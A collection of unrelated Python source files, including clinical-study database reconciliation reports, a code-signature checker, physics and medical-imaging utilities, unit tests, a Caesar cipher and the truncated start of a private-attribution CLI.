#!/usr/bin/env python3
from reporter.core import SqlReport
from reporter.connections import get_redcap_link, RedcapInstance
from reporter.uhl_reports.civicrm import get_case_link
from reporter.emailing import (
RECIPIENT_IT_DWH
)
STUDY_NUMBERS_SQL = '''
WITH c (StudyNumber, civicrm_case_id, civicrm_contact_id) AS (
SELECT DISTINCT
SUBSTRING(StudyNumber, PATINDEX('%[^0]%', StudyNumber + '.'), LEN(StudyNumber)) StudyNumber,
civicrm_case_id,
civicrm_contact_id
FROM STG_CiviCRM.dbo.LCBRU_CaseDetails
WHERE case_type_id IN ({0})
AND case_status_id IN (
5, -- Recruited
8, -- Withdrawn
9, -- Excluded
10 -- Completed
)
AND i2b2ClinDataIntegration.dbo.IsNullOrEmpty(StudyNumber) = 0
), r (StudyNumber, project_id) AS (
SELECT DISTINCT
SUBSTRING(record, PATINDEX('%[^0]%', record + '.'), LEN(record)) StudyNumber,
project_id
FROM {2}.redcap_data
WHERE project_id IN ({1})
AND i2b2ClinDataIntegration.dbo.IsNullOrEmpty(record) = 0
)
'''
class CivicrmNotInRedcap(SqlReport):
def __init__(
self,
case_type_ids,
redcap_project_ids,
recipients=[RECIPIENT_IT_DWH],
schedule=None,
redcap_instance=None,
):
if redcap_instance is None:
redcap_instance = RedcapInstance.internal()
self.redcap_instance = redcap_instance
super().__init__(
introduction=("The following participants have "
"are recruited in CiviCrm, but do not have "
"a record in REDCap"),
recipients=recipients,
sql=STUDY_NUMBERS_SQL.format(
', '.join(['%s'] * len(case_type_ids)),
', '.join(['%s'] * len(redcap_project_ids)),
redcap_instance['staging_database'],
) + '''
SELECT
StudyNumber,
civicrm_case_id,
civicrm_contact_id
FROM c
WHERE c.StudyNumber NOT IN (
SELECT StudyNumber
FROM r
)
''',
parameters=(*case_type_ids, *redcap_project_ids)
)
def get_report_line(self, row):
return '- {}\r\n'.format(
get_case_link(
row['StudyNumber'] or 'Click Here',
row['civicrm_case_id'],
row['civicrm_contact_id'],
))
class RedcapNotInCiviCrm(SqlReport):
def __init__(
self,
case_type_ids,
redcap_project_ids,
recipients=[RECIPIENT_IT_DWH],
schedule=None,
redcap_instance=None,
):
if redcap_instance is None:
redcap_instance = RedcapInstance.internal()
self.redcap_instance = redcap_instance
super().__init__(
introduction=("The following participants "
"are recruited in REDCap, but do not have "
"a record in CiviCRM"),
recipients=recipients,
sql=STUDY_NUMBERS_SQL.format(
', '.join(['%s'] * len(case_type_ids)),
', '.join(['%s'] * len(redcap_project_ids)),
redcap_instance['staging_database'],
) + '''
SELECT
StudyNumber,
project_id
FROM r
WHERE r.StudyNumber NOT IN (
SELECT StudyNumber
FROM c
)
''',
parameters=(*case_type_ids, *redcap_project_ids)
)
def get_report_line(self, row):
return '- {}\r\n'.format(
self.redcap_instance['link_generator'](
row['StudyNumber'] or 'Click Here',
row['project_id'],
row['StudyNumber'],
))
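# --- Usage sketch (not part of the original module) ---
# The case type IDs and REDCap project IDs below are hypothetical placeholders;
# real values come from the study configuration, and constructing a report
# assumes the internal REDCap/CiviCRM connection settings are available.
# Running or scheduling the reports is handled by the reporter framework.
if __name__ == "__main__":
    missing_from_redcap = CivicrmNotInRedcap(
        case_type_ids=[12, 13],
        redcap_project_ids=[101],
    )
    missing_from_civicrm = RedcapNotInCiviCrm(
        case_type_ids=[12, 13],
        redcap_project_ids=[101],
    )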
|
import subprocess
import progressbar
def cigntool_check_files(files):
"""Check each file with the Windows signtool utility and return those whose digital signature could not be verified."""
print('--== PHASE 1 ==--')
print("Checking files for digital signature")
unver_files = []  # files whose signature could not be verified
vered = 0  # count of successfully verified files
f = 0  # number of files processed so far (drives the progress bar)
pb = progressbar.ProgressBar(maxval=len(files), widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.SimpleProgress()])
pb.start()
for file in files:
process = subprocess.run(['signtool', 'verify', '/pa', file], stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
if process.returncode == 1:
unver_files.append(file)
else:
vered = vered + 1
f = f + 1
pb.update(f)
pb.finish()
print("Successfully verified {} files. Remaining {}".format(vered, len(unver_files)))
return unver_files
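# --- Usage sketch (not part of the original module) ---
# Assumes signtool.exe is on PATH (e.g. a Windows machine with the Windows SDK
# installed); the file names below are placeholders for real binaries.
if __name__ == "__main__":
    unsigned = cigntool_check_files(["example1.dll", "example2.exe"])
    for path in unsigned:
        print("No valid signature:", path)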
|
"""
The ``asyncpg`` integration traces database requests made using connection
and cursor objects.
Enabling
~~~~~~~~
The integration is enabled automatically when using
:ref:`ddtrace-run<ddtracerun>` or :func:`patch_all()<ddtrace.patch_all>`.
Or use :func:`patch()<ddtrace.patch>` to manually enable the integration::
from ddtrace import patch
patch(asyncpg=True)
Global Configuration
~~~~~~~~~~~~~~~~~~~~
.. py:data:: ddtrace.config.asyncpg['service']
The service name reported by default for asyncpg connections.
This option can also be set with the ``DD_ASYNCPG_SERVICE``
environment variable.
Default: ``postgres``
Instance Configuration
~~~~~~~~~~~~~~~~~~~~~~
Service
^^^^^^^
To configure the service name used by the asyncpg integration on a per-instance
basis use the ``Pin`` API::
import asyncpg
from ddtrace import Pin
conn = asyncpg.connect("postgres://localhost:5432")
Pin.override(conn, service="custom-service")
"""
from ...internal.utils.importlib import require_modules
required_modules = ["asyncpg"]
with require_modules(required_modules) as missing_modules:
if not missing_modules:
from .patch import patch
from .patch import unpatch
__all__ = [
"patch",
"unpatch",
]
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("PAT")
process.MessageLogger = cms.Service(
"MessageLogger",
categories = cms.untracked.vstring('info', 'debug','cout')
)
process.options = cms.untracked.PSet(
Rethrow = cms.untracked.vstring('ProductNotFound')
)
# source
process.source = cms.Source("PoolSource",
#fileNames = cms.untracked.vstring('rfio:/castor/cern.ch/user/r/rompotis/RedigiSummer08RootTrees/WenuRedigi_RECO_SAMPLE.root')
fileNames = cms.untracked.vstring(
'file:zee_Summer09-MC_31X_V3_AODSIM_v1_AODSIM.root'
)
)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
## Load additional processes
process.load("Configuration.StandardSequences.Geometry_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
## global tags:
#process.GlobalTag.globaltag = cms.string('MC_31X_V5::All')
process.GlobalTag.globaltag = cms.string('STARTUP31X_V4::All')
process.load("Configuration.StandardSequences.MagneticField_cff")
################################################################################################
### P r e p a r a t i o n o f t h e P A T O b j e c t s f r o m A O D ###
################################################################################################
## pat sequences to be loaded:
process.load("CommonTools.ParticleFlow.PF2PAT_cff")
process.load("PhysicsTools.PatAlgos.patSequences_cff")
process.load("PhysicsTools.PatAlgos.triggerLayer1.triggerProducer_cff")
##
#
# for ecal isolation: set the correct name of the ECAL rechit collection
#
process.eleIsoDepositEcalFromHits.ExtractorPSet.barrelEcalHits = cms.InputTag("reducedEcalRecHitsEB", "", "RECO")
process.eleIsoDepositEcalFromHits.ExtractorPSet.endcapEcalHits = cms.InputTag("reducedEcalRecHitsEE", "", "RECO")
#
#
process.eidRobustHighEnergy.reducedBarrelRecHitCollection = cms.InputTag("reducedEcalRecHitsEB", "", "RECO")
process.eidRobustHighEnergy.reducedEndcapRecHitCollection = cms.InputTag("reducedEcalRecHitsEE", "", "RECO")
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## CHOICE OF THE HLT PATH (this section is not used by PAT)
##
## Define here as string the names of the triggers only once
## please consult the table of the available triggers at the end of this file
# trigger menu selection
##
#process.patTrigger.processName = cms.string(HLT_process_name)
#process.patTriggerMatcher = cms.Sequence(process.patTriggerElectronMatcher)
#process.electronTriggerMatchHltElectrons.pathNames = cms.vstring(HLT_path_name)
#process.patTriggerMatchEmbedder = cms.Sequence(process.cleanLayer1ElectronsTriggerMatch)
#process.patTriggerSequence = cms.Sequence(process.patTrigger*process.patTriggerMatcher*
# process.patTriggerMatchEmbedder)
##
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## MET creation <=== WARNING: YOU MAY WANT TO MODIFY THIS PART OF THE CODE %%%%%%%%%%%%%
## specify the names of the MET collections that you need here %%%%
## #%%
## if you don't specify anything the default MET is the raw Calo MET #%%
process.layer1RawCaloMETs = process.layer1METs.clone( #%%
metSource = cms.InputTag("met","","RECO"),
addTrigMatch = cms.bool(False),
addMuonCorrections = cms.bool(False),
addGenMET = cms.bool(False),
)
## specify here what you want to have on the plots! <===== MET THAT YOU WANT ON THE PLOTS %%%%%%%
myDesiredMetCollection = 'layer1RawCaloMETs'
## modify the sequence of the MET creation: #%%
process.makeLayer1METs = cms.Sequence(process.patMETCorrections * process.layer1METs *
process.layer1RawCaloMETs)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## modify the final pat sequence: keep only electrons + METS (muons are needed for met corrections)
process.allLayer1Objects = cms.Sequence(process.makeAllLayer1Electrons+process.makeAllLayer1Muons+process.makeLayer1METs)
process.selectedLayer1Objects = cms.Sequence(process.selectedLayer1Electrons+process.selectedLayer1Muons)
process.cleanLayer1Objects = cms.Sequence(process.cleanLayer1Muons*process.cleanLayer1Electrons)
process.countLayer1Objects = cms.Sequence(process.countLayer1Electrons+process.countLayer1Muons)
process.patDefaultSequence = cms.Sequence(process.allLayer1Objects * process.selectedLayer1Objects *
process.cleanLayer1Objects*process.countLayer1Objects
)
## ################################################################################
##
## the filter to select the candidates from the data samples
##
## WARNING: you may want to modify this item: T R I G G E R S E L E C T I O N
HLT_process_name = "HLT8E29" # options: HLT or HLT8E29
# trigger path selection
HLT_path_name = "HLT_Ele10_LW_L1R"
# trigger filter name
HLT_filter_name = "hltL1NonIsoHLTNonIsoSingleElectronLWEt10PixelMatchFilter"
#
process.zeeFilter = cms.EDFilter('ZeeCandidateFilter',
# cuts
ETCut = cms.untracked.double(20.),
METCut = cms.untracked.double(0.),
# trigger
triggerCollectionTag = cms.untracked.InputTag("TriggerResults","",HLT_process_name),
triggerEventTag = cms.untracked.InputTag("hltTriggerSummaryAOD","",HLT_process_name),
hltpath = cms.untracked.string(HLT_path_name),
hltpathFilter = cms.untracked.InputTag(HLT_filter_name,"",HLT_process_name),
electronMatched2HLT = cms.untracked.bool(True),
electronMatched2HLT_DR = cms.untracked.double(0.2),
# electrons and MET
electronCollectionTag = cms.untracked.InputTag("selectedLayer1Electrons","","PAT"),
metCollectionTag = cms.untracked.InputTag(myDesiredMetCollection,"","PAT")
)
####################################################################################
##
## the Z selection that you prefer
selection_a2 = cms.PSet (
trackIso_EB = cms.untracked.double(7.2),
ecalIso_EB = cms.untracked.double(5.7),
hcalIso_EB = cms.untracked.double(8.1),
sihih_EB = cms.untracked.double(0.01),
dphi_EB = cms.untracked.double(1000.),
deta_EB = cms.untracked.double(0.0071),
hoe_EB = cms.untracked.double(1000),
trackIso_EE = cms.untracked.double(5.1),
ecalIso_EE = cms.untracked.double(5.0),
hcalIso_EE = cms.untracked.double(3.4),
sihih_EE = cms.untracked.double(0.028),
dphi_EE = cms.untracked.double(1000.),
deta_EE = cms.untracked.double(0.0066),
hoe_EE = cms.untracked.double(1000.)
)
selection_inverse = cms.PSet (
trackIso_EB_inv = cms.untracked.bool(True),
trackIso_EE_inv = cms.untracked.bool(True)
)
####################################################################################
##
## and the plot creator
process.plotter = cms.EDAnalyzer('ZeePlots',
selection_a2,
zeeCollectionTag = cms.untracked.InputTag("zeeFilter","selectedZeeCandidates","PAT")
)
process.p = cms.Path(process.patDefaultSequence + process.zeeFilter + process.plotter)
|
#!/usr/bin/env python
import unittest
from ternip.formats.gate import GateDocument
from ternip.timex import Timex
class GateDocumentTest(unittest.TestCase):
def test_get_sents(self):
t = GateDocument("""This POS B 20101010
is POS I
a POS I
sentence POS I
. . I
And POS B
a POS I
second POS I
sentence POS I
. POS I
Outside POS O""")
self.assertEqual(t.get_sents(), [[('This', 'POS', set()), ('is', 'POS', set()), ('a', 'POS', set()), ('sentence', 'POS', set()), ('.', '.', set())], [('And', 'POS', set()), ('a', 'POS', set()), ('second', 'POS', set()), ('sentence', 'POS', set()), ('.', 'POS', set()), ], [('Outside', 'POS', set())]])
def test_get_dct_sents(self):
t = GateDocument("""This POS B 20101010
is POS I
a POS I
sentence POS I
. . I
And POS B
a POS I
second POS I
sentence POS I
. POS I
Outside POS O""")
self.assertEqual(t.get_dct_sents(), [[('20101010', 'DCT', set())]])
def test_reconcile_sents(self):
d = GateDocument("""This POS B 20101010
is POS I
a POS I
sentence POS I
. . I
And POS B
a POS I
second POS I
sentence POS I
. POS I
Outside POS O""")
t = Timex(id=1)
d.reconcile([[('This', 'POS', set()), ('is', 'POS', set()), ('a', 'POS', set([t])), ('sentence', 'POS', set([t])), ('.', '.', set())], [('And', 'POS', set()), ('a', 'POS', set()), ('second', 'POS', set()), ('sentence', 'POS', set()), ('.', 'POS', set()), ], [('Outside', 'POS', set())]])
self.assertEqual(str(d), """This
is
a id=t1
sentence t1
.
And
a
second
sentence
.
Outside
""")
def test_reconcile_sents_attrs(self):
t1 = Timex(id=1, type='date')
t2 = Timex(id=2)
t3 = Timex(id=3)
t1.value = "20100710"
t1.mod = "BEFORE"
t1.freq = "1M"
t1.comment = "Test"
t1.granuality = "1D"
t1.non_specific = True
t1.quant = 'EVERY'
t1.temporal_function = True
t1.document_role = 'MODIFICATION_TIME'
t1.begin_timex = t1
t1.end_timex = t2
t1.context = t3
d = GateDocument("""This POS B 20101010
is POS I
a POS I
sentence POS I
. . I
And POS B
a POS I
second POS I
sentence POS I
. POS I
Outside POS O""")
d.reconcile([[('This', 'POS', set()), ('is', 'POS', set()), ('a', 'POS', set([t1])), ('sentence', 'POS', set([t1])), ('.', '.', set())], [('And', 'POS', set()), ('a', 'POS', set()), ('second', 'POS', set()), ('sentence', 'POS', set()), ('.', 'POS', set()), ], [('Outside', 'POS', set())]])
self.assertEqual(str(d), """This
is
a id=t1,value=20100710,type=DATE,mod=BEFORE,freq=1M,quant=EVERY,temporalFunction=true,functionInDocument=MODIFICATION_TIME,beginPoint=t1,endPoint=t2,anchorTimeID=t3
sentence t1
.
And
a
second
sentence
.
Outside
""") |
import csv
import logging
import os
import SimpleITK as sitk
import numpy as np
import radiomics
from radiomics import featureextractor
from filelock import FileLock
from scipy import ndimage
from random import randint
'''
This file contains functions which interact with the Pyradiomics library.
Frank te Nijenhuis 2020
'''
# These constants are used by the logger to switch verbosity levels.
HI_VERBOSITY = 10
LO_VERBOSITY = 40
def setup_logger(log_path):
radiomics.setVerbosity(LO_VERBOSITY)
# Get pyradiomics logger, loglevel DEBUG
logger = radiomics.logger
logger.setLevel(logging.ERROR)
# Set up the handler to write out all log entries to a file
handler = logging.FileHandler(filename=log_path, mode='w')
formatter = logging.Formatter("%(levelname)s:%(name)s: %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def ROI_sampling(mask: sitk.Image) -> sitk.Image:
"""
Clips the default mask using a standard area, overcoming the area dependence of certain first order measures such as
Shannon entropy.
"""
# The original type is float64; we convert to unsigned 32-bit integers
discretized_mask = sitk.Cast(mask, sitk.sitkUInt32)
output = sitk.Image(mask.GetSize(), sitk.sitkUInt32)
# For each slice in the mask we try to find a suitable region
for z in np.arange(discretized_mask.GetDepth()):
# Extract a slice from the mask
img = discretized_mask[:, :, z.item()]
img_arr = sitk.GetArrayFromImage(img)
# Erode the mask using a 20 x 20 box
img_arr_eroded = ndimage.binary_erosion(img_arr, structure=np.ones((20, 20)))
out_arr = sitk.GetArrayFromImage(output[:, :, z.item()])
# Pick a random location within the eroded mask, this will be the new center of our window
indices = np.nonzero(img_arr_eroded)
# Check if there are any indices in the tuple
if len(indices[0]):
random_index = randint(0, len(indices[0]) - 1)
# Create a new image of the intersect of the mask with the selected window
c_x = indices[0][random_index]
c_y = indices[1][random_index]
out_arr[c_x - 10:c_x + 10, c_y - 10:c_y + 10] = img_arr[c_x - 10:c_x + 10, c_y - 10:c_y + 10]
# Paste the new image into the output image
img_vol = sitk.JoinSeries(sitk.GetImageFromArray(out_arr))
output = sitk.Paste(output, img_vol, img_vol.GetSize(), destinationIndex=[0, 0, z.item()])
output.CopyInformation(mask)
return output
def initialize_extractor(parameters: str, logger: radiomics.logger) -> featureextractor.RadiomicsFeatureExtractor:
# Initialize feature extractor, if inputfile is valid
if os.path.isfile(parameters):
extractor = radiomics.featureextractor.RadiomicsFeatureExtractor(parameters)
else:
logger.warning('Parameter file not found, using hardcoded settings instead')
settings = {'binWidth': 25, 'resampledPixelSpacing': None, 'interpolator': sitk.sitkBSpline,
'enableCExtensions': True}
extractor = radiomics.featureextractor.RadiomicsFeatureExtractor(**settings)
logger.info("Parameters loaded")
return extractor
def extract_features(files: list, extractor: radiomics.featureextractor.RadiomicsFeatureExtractor, output_csv,
lab_val: int = 1, logger: radiomics.logger = None):
"""
Reads a tuple of file and mask, extracts features
"""
# Do this to handle parallel processing where we can't pass the logger
if not logger:
info = warning = print
else:
info = logger.info
warning = logger.warning
image, mask, label = files
# TODO Efficiently extract for all labels in mask
if label:
# Label defined in the input file takes precedence over the argument
info('Overriding manual label (-b) parameter, was ' + str(lab_val) + ', now ' + label)
lab_val = int(label)
try:
result = extractor.execute(image, mask, label=lab_val)
# write to file
except ValueError as err:
warning("Unable to extract features, error: {}".format(err))
return None
store_row(image, mask, result, output_csv, logger)
# info('Extraction successful: \t' + image + '\t' + mask)
return result
def store_row(img, msk, features, out_path, logger):
# Store the calculated features in a csv file in default pyradiomics batch output style
if not features:
logger.warning('Can\'t store output, no features to store, continuing')
return
try:
with FileLock(out_path + '.lock'):
out_file = open(out_path, 'a')
csv_columns = ["Image", "Mask", *list(features.keys())]
writer = csv.DictWriter(out_file, fieldnames=csv_columns)
if os.path.getsize(os.path.join(os.getcwd(), out_path)) == 0:
# File is empty, we can write the header
writer.writeheader()
features['Image'] = img
features['Mask'] = msk
writer.writerow(features)
out_file.flush()
except ValueError as err:
print(err)
def sample_masks(file_list):
for (_, mask_name, _) in file_list:
mask = sitk.Cast(sitk.ReadImage(mask_name), sitk.sitkInt32)
# Hardcoded the levels right now, these correspond to the labels within the masks
low = 1
high = 5
for lvl in np.arange(low, high + 1):
tmp_mask = sitk.GetArrayFromImage(mask)
tmp_mask[tmp_mask != lvl] = 0
tmp_mask_img = sitk.GetImageFromArray(tmp_mask)
tmp_mask_img.CopyInformation(mask)
updated_mask = ROI_sampling(tmp_mask_img)
mask_prefix, mask_extension = os.path.splitext(mask_name)
sitk.WriteImage(updated_mask, mask_prefix + "_sampled_" + str(lvl) + mask_extension)
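# --- Usage sketch (not part of the original module) ---
# File names are placeholders; a real run needs an image, a matching mask and,
# optionally, a Pyradiomics parameter file (otherwise the hardcoded settings
# in initialize_extractor apply).
if __name__ == "__main__":
    log = setup_logger("pyradiomics_example.log")
    extractor = initialize_extractor("params.yaml", log)
    # (image, mask, label): a label of None means the lab_val argument is used.
    extract_features(("image.nii.gz", "mask.nii.gz", None), extractor,
                     "features.csv", lab_val=1, logger=log)
|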
"""
This is a simple napari plugin for 3D viewing of NIfTI files
(.nii.gz), a common MRI file format.
"""
from napari_plugin_engine import napari_hook_implementation
@napari_hook_implementation
def napari_get_reader(path):
if isinstance(path, list):
path = path[0]
if not path.endswith(".nii.gz"):
return None
return MRI_reader
def MRI_reader(path):
"""Given a single path, returns a tuple [(data, metadata)]"""
import numpy as np
import nibabel as nib
# Read a .nii file and header info including voxel spacing
img_file = nib.load(path)
img_data = img_file.get_fdata()
# sagittal view
img_sag_reversed = (img_data[:, :, ::-1])
img_sag_final = (np.transpose(img_sag_reversed, (0, 2, 1)))
# save the sagittal MRI file and view other planes (coronal and axial)
# by the roll-dimension button
data = img_sag_final
# Read and store the image header information
metadata = {
name: img_file.header[name]
for name in img_file.header.keys()
}
params = {
"metadata": metadata,
}
return [(data, params)]
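# --- Usage sketch (not part of the original module) ---
# This is roughly how napari resolves and calls the reader hook; the file name
# is a placeholder for any .nii.gz volume on disk.
if __name__ == "__main__":
    reader = napari_get_reader("example_scan.nii.gz")
    if reader is not None:
        layer_data = reader("example_scan.nii.gz")
        data, params = layer_data[0]
        print(data.shape, sorted(params["metadata"].keys())[:5])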
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
from ax.utils.common.testutils import TestCase
class InitTest(TestCase):
def testInitFiles(self) -> None:
for root, _dirs, files in os.walk("./ax/ax", topdown=False):
self.assertTrue(
"__init__.py" in files,
"directory " + root + " does not contain a .__init__.py file",
)
|
#! /usr/bin/env python3
# -*- coding:utf-8 -*-
###############################################################
# kenwaldek MIT-license
#
# Title: testing oled Version: 1.0
# Date: 29-01-2017 Language: python3
# Description: testing an oled display with i2c on rpi
#
###############################################################
# Share if you care, do something
from luma.core.serial import i2c
from luma.core.render import canvas
from luma.oled.device import ssd1306, ssd1325, ssd1331, sh1106
serial = i2c(port=1, address=0x3C)
device = ssd1306(serial, rotate=1)
# Box and text rendered in portrait mode
with canvas(device) as draw:
#draw.rectangle(device.bounding_box, outline="white", fill="black")
draw.text((10, 40), "Hello World", fill="white") |
#!/usr/bin/env python3
#coding=utf8
def getSequenceLi():
li = []
li.append({'_id': 'pubDictionaryId', 'c': 100})
li.append({'_id': 'transactionsId', 'c': 100})
li.append({'_id': 'demoId', 'c': 100})
li.append({'_id': 'actionTestId', 'c': 100})
li.append({'_id': 'pubReferenceLogId', 'c': 100})
li.append({'_id': 'currencyTypeId', 'c': 100})
li.append({'_id': 'billTypeId', 'c': 100})
li.append({'_id': 'billTypeParameterId', 'c': 100})
li.append({'_id': 'systemParameterId', 'c': 100})
li.append({'_id': 'taxTypeId', 'c': 100})
li.append({'_id': 'accountingPeriodId', 'c': 100})
li.append({'_id': 'providerTypeId', 'c': 100})
li.append({'_id': 'providerId', 'c': 100})
li.append({'_id': 'customerTypeId', 'c': 100})
li.append({'_id': 'customerId', 'c': 100})
li.append({'_id': 'measureUnitId', 'c': 100})
li.append({'_id': 'incomeTypeId', 'c': 100})
li.append({'_id': 'incomeItemId', 'c': 100})
li.append({'_id': 'articleId', 'c': 100})
li.append({'_id': 'articleTypeId', 'c': 100})
li.append({'_id': 'bankId', 'c': 100})
li.append({'_id': 'bankAccountId', 'c': 100})
li.append({'_id': 'bankAccountCurrencyTypeId', 'c': 100})
li.append({'_id': 'cashAccountId', 'c': 100})
li.append({'_id': 'balanceTypeId', 'c': 100})
li.append({'_id': 'payPactId', 'c': 100})
li.append({'_id': 'accountInitId', 'c': 100})
li.append({'_id': 'cashAccountInitId', 'c': 100})
li.append({'_id': 'bankAccountInitId', 'c': 100})
li.append({'_id': 'gatheringBillId', 'c': 100})
li.append({'_id': 'payBillId', 'c': 100})
li.append({'_id': 'accountInOutId', 'c': 100})
li.append({'_id': 'accountInOutItemId', 'c': 100})
li.append({'_id': 'bbsPostId', 'c': 100})
li.append({'_id': 'bbsPostReadId', 'c': 100})
li.append({'_id': 'accountInOutDisplayId', 'c': 100})
li.append({'_id': 'nullId', 'c': 100})
li.append({'_id': 'sysUserId', 'c': 100})
li.append({'_id': 'sysUnitId', 'c': 100})
li.append({'_id': 'sysStepId', 'c': 100})
li.append({'_id': 'lastSessionDataId', 'c': 100})
li.append({'_id': 'menuId', 'c': 100})
return li
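# --- Usage sketch (not part of the original module) ---
# getSequenceLi() only builds the seed documents; persisting them is outside
# this file. The pymongo lines are an assumption about the intended store
# (a MongoDB-style counter/sequence collection) and are left commented out.
if __name__ == "__main__":
    for doc in getSequenceLi():
        print(doc['_id'], doc['c'])
    # from pymongo import MongoClient
    # MongoClient().mydb.sequence.insert_many(getSequenceLi())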
|
"""
Function for encoding text with a rotational cipher,
of which ROT13 is the best-known Caesar-cipher variant.
Args:
text: string of text to be encoded
key: integer number of positions to shift each letter
Returns:
encoded: the encoded text
Examples:
- ROT5 `omg` gives `trl`
- ROT0 `c` gives `c`
- ROT26 `Cool` gives `Cool`
- ROT13 `The quick brown fox` gives `Gur dhvpx oebja sbk`
"""
from string import ascii_lowercase
def rotate(text, key):
"Rotational or Caesar cipher encoding"
letters = ascii_lowercase
encoded = ''
for character in text:
if character.isalpha():
index = (letters.index(character.lower()) + key) % 26
encoded_letter = letters[index]
if character.isupper():
encoded = encoded + encoded_letter.upper()
else:
encoded = encoded + encoded_letter
else:
encoded = encoded + character
return encoded
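# --- Usage sketch (not part of the original module) ---
# Mirrors the examples given in the module docstring.
if __name__ == "__main__":
    assert rotate("omg", 5) == "trl"
    assert rotate("Cool", 26) == "Cool"
    assert rotate("The quick brown fox", 13) == "Gur dhvpx oebja sbk"
    print(rotate("The quick brown fox", 13))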
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
"""
CLI for running a Private Attribution study
Usage:
pa-coordinator create_instance <instance_id> --config=<config_file> --input_path=<input_path> --output_dir=<output_dir> --role=<pa_role> --num_pid_containers=<num_pid_containers> --num_mpc_containers=<num_mpc_containers> --num_files_per_mpc_container=<num_files_per_mpc_container> [--padding_size=<padding_size> --concurrency=<concurrency> --k_anonymity_threshold=<k_anonymity_threshold> --hmac_key=<base64_key>] [options]
pa-coordinator id_match <instance_id> --config=<config_file> [--server_ips=<server_ips> --dry_run] [options]
pa-coordinator prepare_compute_input <instance_id> --config=<config_file> [--dry_run --log_cost_to_s3] [options]
pa-coordinator compute_attribution <instance_id> --config=<config_file> --game=<game_name> --attribution_rule=<attribution_rule> --aggregation_type=<aggregation_type> [--server_ips=<server_ips> --dry_run --log_cost_to_s3] [options]
pa-coordinator aggregate_shards <instance_id> --config=<config_file> --game=<game_name> [--server_ips=<server_ips> --dry_run --log_cost_to_s3] [options]
pa-coordinator get_server_ips <instance_id> --config=<config_file> [options]
pa-coordinator get_instance <instance_id> --config=<config_file> [options]
pa-coordinator print_instance <instance_id> --config=<config_file> [options]
Options:
-h --help Show this help
--log_path=<path> Override the default path where logs are saved
--verbose Set logging level to DEBUG
"""
import logging
import os
from collections import defaultdict
from pathlib import Path, PurePath
from typing import Any, DefaultDict, Dict, List, Optional
import schema
from docopt import docopt
from fbpcp.entity.mpc_instance import MPCInstance
from fbpcp.service.container import ContainerService
from fbpcp.service.onedocker import OneDockerService
from fbpcp.service.mpc import MPCService
from fbpcp.service.storage import StorageService
from fbpcp.util import reflect, yaml
from fbpmp.onedocker_binary_config import OneDockerBinaryConfig
from fbpmp.onedocker_service_config import OneDockerServiceConfig
from fbpmp.pid.entity.pid_instance import PIDInstance, PIDProtocol
from fbpmp.pid.service.pid_service.pid import PIDService
from fbpmp.private_computation.entity.private_computation_instance import (
PrivateComputationInstance,
)
from fbpmp.private_computation.entity.private_computation_instance import (
PrivateComputationRole,
)
from fbpmp.private_attribution.service.private_attribution import (
PrivateAttributionService,
)
DEFAULT_HMAC_KEY: str = ""
DEFAULT_PADDING_SIZE: int = 4
DEFAULT_CONCURRENCY: int = 1
DEFAULT_K_ANONYMITY_THRESHOLD: int = 0
def _build_pa_service(
pa_config: Dict[str, Any], mpc_config: Dict[str, Any], pid_config: Dict[str, Any]
) -> PrivateAttributionService:
pa_instance_repository_config = pa_config["dependency"][
"PrivateComputationInstanceRepository"
]
repository_class = reflect.get_class(pa_instance_repository_config["class"])
repository_service = repository_class(
**pa_instance_repository_config["constructor"]
)
onedocker_binary_config_map = _build_onedocker_binary_cfg_map(
pa_config["dependency"]["OneDockerBinaryConfig"]
)
onedocker_service_config = _build_onedocker_service_cfg(
pa_config["dependency"]["OneDockerServiceConfig"]
)
container_service = _build_container_service(
pa_config["dependency"]["ContainerService"]
)
onedocker_service = _build_onedocker_service(
container_service, onedocker_service_config.task_definition
)
storage_service = _build_storage_service(pa_config["dependency"]["StorageService"])
return PrivateAttributionService(
repository_service,
_build_mpc_service(
mpc_config,
onedocker_service_config,
container_service,
storage_service
),
_build_pid_service(
pid_config,
onedocker_service,
storage_service,
onedocker_binary_config_map,
),
onedocker_service,
onedocker_binary_config_map,
storage_service,
)
def _build_container_service(config: Dict[str, Any]) -> ContainerService:
container_class = reflect.get_class(config["class"])
return container_class(**config["constructor"])
def _build_onedocker_service(
container_service: ContainerService,
task_definition: str,
) -> OneDockerService:
return OneDockerService(container_service, task_definition)
def _build_mpc_service(
config: Dict[str, Any],
onedocker_service_config: OneDockerServiceConfig,
container_service: ContainerService,
storage_service: StorageService,
) -> MPCService:
mpcinstance_repository_config = config["dependency"]["MPCInstanceRepository"]
repository_class = reflect.get_class(mpcinstance_repository_config["class"])
repository_service = repository_class(
**mpcinstance_repository_config["constructor"]
)
mpc_game_config = config["dependency"]["MPCGameService"]
pa_game_repo_config = mpc_game_config["dependency"][
"PrivateAttributionGameRepository"
]
pa_game_repo_class = reflect.get_class(pa_game_repo_config["class"])
pa_game_repo = pa_game_repo_class()
mpc_game_class = reflect.get_class(mpc_game_config["class"])
mpc_game_svc = mpc_game_class(pa_game_repo)
task_definition = onedocker_service_config.task_definition
return MPCService(
container_service,
storage_service,
repository_service,
task_definition,
mpc_game_svc,
)
def _build_onedocker_service_cfg(
onedocker_service_config: Dict[str, Any]
) -> OneDockerServiceConfig:
return OneDockerServiceConfig(**onedocker_service_config["constructor"])
def _build_onedocker_binary_cfg(
onedocker_binary_config: Dict[str, Any]
) -> OneDockerBinaryConfig:
